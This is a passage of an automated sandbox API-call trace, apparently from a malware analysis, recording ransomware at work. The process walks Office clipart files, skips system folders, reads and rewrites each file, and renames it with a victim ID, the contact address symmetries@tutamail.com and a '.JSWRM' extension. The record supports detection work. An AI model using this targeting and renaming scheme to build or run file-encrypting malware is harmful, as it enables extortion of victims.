(in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=23596) returned 1 [0080.588] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0080.588] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x5c20) returned 0x24d210 [0080.588] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x5c20, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x5c20, lpOverlapped=0x0) returned 1 [0080.591] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0080.591] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x5c20, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x5c20, lpOverlapped=0x0) returned 1 [0080.591] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0080.591] CloseHandle (hObject=0x314) returned 1 [0080.592] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2101f0 [0080.592] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0080.592] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0080.592] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22ce70, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0080.592] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0080.592] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0080.592] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0080.592] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a420 [0080.592] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a420, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0080.592] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a420 | out: hHeap=0x1e0000) returned 1 [0080.592] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cea0 [0080.592] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247f60 [0080.592] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cea0 | out: hHeap=0x1e0000) returned 1 [0080.592] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0080.592] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0103850.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0103850.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0103850.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0103850.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0080.593] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247f60 | out: hHeap=0x1e0000) returned 1 [0080.593] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2101f0 | out: hHeap=0x1e0000) returned 1 [0080.593] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210a40 | out: hHeap=0x1e0000) returned 1 [0080.593] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe605048, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe605048, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe62b2d5, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1434, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0105230.WMF", cAlternateFileName="")) returned 1 [0080.593] lstrcmpiW (lpString1="J0105230.WMF", lpString2=".") returned 1 [0080.593] lstrcmpiW (lpString1="J0105230.WMF", lpString2="..") returned 1 [0080.593] lstrcmpiW (lpString1="J0105230.WMF", lpString2="...") returned 1 [0080.593] lstrcmpiW (lpString1="J0105230.WMF", lpString2="windows") returned -1 [0080.593] lstrcmpiW (lpString1="J0105230.WMF", lpString2="recovery") returned -1 [0080.593] lstrcmpiW (lpString1="J0105230.WMF", lpString2="perflogs") returned -1 [0080.593] lstrcmpiW (lpString1="J0105230.WMF", lpString2="documents and settings") returned 1 [0080.593] lstrcmpiW (lpString1="J0105230.WMF", lpString2="$RECYCLE.BIN") returned 1 [0080.593] lstrcmpiW (lpString1="J0105230.WMF", lpString2="system volume information") returned -1 [0080.593] lstrcmpiW (lpString1="J0105230.WMF", lpString2="msocache") returned -1 [0080.593] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0080.593] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0105230.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0080.593] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0105230.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0105230.WMF", lpUsedDefaultChar=0x0) returned 12 [0080.593] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0080.593] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0080.593] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0105230.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0080.593] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0105230.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0105230.WMF", lpUsedDefaultChar=0x0) returned 12 [0080.593] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0080.593] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210320 [0080.593] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210dd0 | out: hHeap=0x1e0000) returned 1 [0080.593] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0080.593] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0080.593] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ad8 [0080.593] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105230.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105230.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0080.594] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=5172) returned 1 [0080.594] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0080.594] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1430) returned 0x205850 [0080.594] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x1430, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x1430, lpOverlapped=0x0) returned 1 [0080.638] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0080.638] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x1430, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x1430, lpOverlapped=0x0) returned 1 [0080.638] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0080.638] CloseHandle (hObject=0x314) returned 1 [0080.638] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2109a8 [0080.638] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0080.638] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0080.638] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0080.638] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0080.638] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0080.638] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0080.638] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a378 [0080.638] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a378, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0080.638] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a378 | out: hHeap=0x1e0000) returned 1 [0080.638] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cf48 [0080.638] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2472c8 [0080.638] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cf48 | out: hHeap=0x1e0000) returned 1 [0080.638] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0080.638] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105230.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105230.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105230.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105230.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0080.640] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2472c8 | out: hHeap=0x1e0000) returned 1 [0080.640] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2109a8 | out: hHeap=0x1e0000) returned 1 [0080.640] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ad8 | out: hHeap=0x1e0000) returned 1 [0080.640] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe605048, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe605048, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe62b2d5, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1600, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0105232.WMF", cAlternateFileName="")) returned 1 [0080.640] lstrcmpiW (lpString1="J0105232.WMF", lpString2=".") returned 1 [0080.640] lstrcmpiW (lpString1="J0105232.WMF", lpString2="..") returned 1 [0080.640] lstrcmpiW (lpString1="J0105232.WMF", lpString2="...") returned 1 [0080.640] lstrcmpiW (lpString1="J0105232.WMF", lpString2="windows") returned -1 [0080.640] lstrcmpiW (lpString1="J0105232.WMF", lpString2="recovery") returned -1 [0080.640] lstrcmpiW (lpString1="J0105232.WMF", lpString2="perflogs") returned -1 [0080.640] lstrcmpiW (lpString1="J0105232.WMF", lpString2="documents and settings") returned 1 [0080.640] lstrcmpiW (lpString1="J0105232.WMF", lpString2="$RECYCLE.BIN") returned 1 [0080.640] lstrcmpiW (lpString1="J0105232.WMF", lpString2="system volume information") returned -1 [0080.640] lstrcmpiW (lpString1="J0105232.WMF", lpString2="msocache") returned -1 [0080.640] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0080.640] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0105232.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0080.640] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0105232.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0105232.WMF", lpUsedDefaultChar=0x0) returned 12 [0080.640] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0080.640] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0080.640] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0105232.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0080.640] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0105232.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0105232.WMF", lpUsedDefaultChar=0x0) returned 12 [0080.640] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0080.640] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210748 [0080.640] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210320 | out: hHeap=0x1e0000) returned 1 [0080.640] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0080.640] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0080.640] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2100c0 [0080.640] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105232.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105232.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0080.641] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=5632) returned 1 [0080.641] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0080.641] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1600) returned 0x205850 [0080.641] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x1600, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x1600, lpOverlapped=0x0) returned 1 [0080.643] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0080.643] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x1600, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x1600, lpOverlapped=0x0) returned 1 [0080.643] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0080.643] CloseHandle (hObject=0x314) returned 1 [0080.643] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0080.643] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0080.643] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0080.643] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0080.643] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0080.643] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0080.643] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0080.643] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3a8 [0080.643] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3a8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0080.643] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3a8 | out: hHeap=0x1e0000) returned 1 [0080.643] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d680 [0080.643] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247f60 [0080.643] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d680 | out: hHeap=0x1e0000) returned 1 [0080.643] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0080.644] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105232.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105232.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105232.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105232.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0080.644] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247f60 | out: hHeap=0x1e0000) returned 1 [0080.644] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0080.644] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2100c0 | out: hHeap=0x1e0000) returned 1 [0080.644] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe605048, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe605048, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe605048, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xd74, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0105234.WMF", cAlternateFileName="")) returned 1 [0080.644] lstrcmpiW (lpString1="J0105234.WMF", lpString2=".") returned 1 [0080.644] lstrcmpiW (lpString1="J0105234.WMF", lpString2="..") returned 1 [0080.644] lstrcmpiW (lpString1="J0105234.WMF", lpString2="...") returned 1 [0080.644] lstrcmpiW (lpString1="J0105234.WMF", lpString2="windows") returned -1 [0080.644] lstrcmpiW (lpString1="J0105234.WMF", lpString2="recovery") returned -1 [0080.644] lstrcmpiW (lpString1="J0105234.WMF", lpString2="perflogs") returned -1 [0080.644] lstrcmpiW (lpString1="J0105234.WMF", lpString2="documents and settings") returned 1 [0080.645] lstrcmpiW (lpString1="J0105234.WMF", lpString2="$RECYCLE.BIN") returned 1 [0080.645] lstrcmpiW (lpString1="J0105234.WMF", lpString2="system volume information") returned -1 [0080.645] lstrcmpiW (lpString1="J0105234.WMF", lpString2="msocache") returned -1 [0080.645] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0080.645] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0105234.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0080.645] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0105234.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0105234.WMF", lpUsedDefaultChar=0x0) returned 12 [0080.645] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0080.645] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0080.645] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0105234.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0080.645] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0105234.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0105234.WMF", lpUsedDefaultChar=0x0) returned 12 [0080.645] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0080.645] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210288 [0080.645] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210748 | out: hHeap=0x1e0000) returned 1 [0080.645] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0080.645] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0080.645] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210910 [0080.645] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105234.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105234.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0080.646] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=3444) returned 1 [0080.646] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0080.646] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd70) returned 0x23fc98 [0080.646] ReadFile (in: hFile=0x314, lpBuffer=0x23fc98, nNumberOfBytesToRead=0xd70, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesRead=0x345e89c*=0xd70, lpOverlapped=0x0) returned 1 [0080.648] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0080.648] WriteFile (in: hFile=0x314, lpBuffer=0x23fc98*, nNumberOfBytesToWrite=0xd70, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesWritten=0x345e898*=0xd70, lpOverlapped=0x0) returned 1 [0080.648] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23fc98 | out: hHeap=0x1e0000) returned 1 [0080.648] CloseHandle (hObject=0x314) returned 1 [0080.648] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210450 [0080.648] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0080.648] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0080.648] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0080.648] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0080.648] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0080.648] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0080.648] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a438 [0080.648] 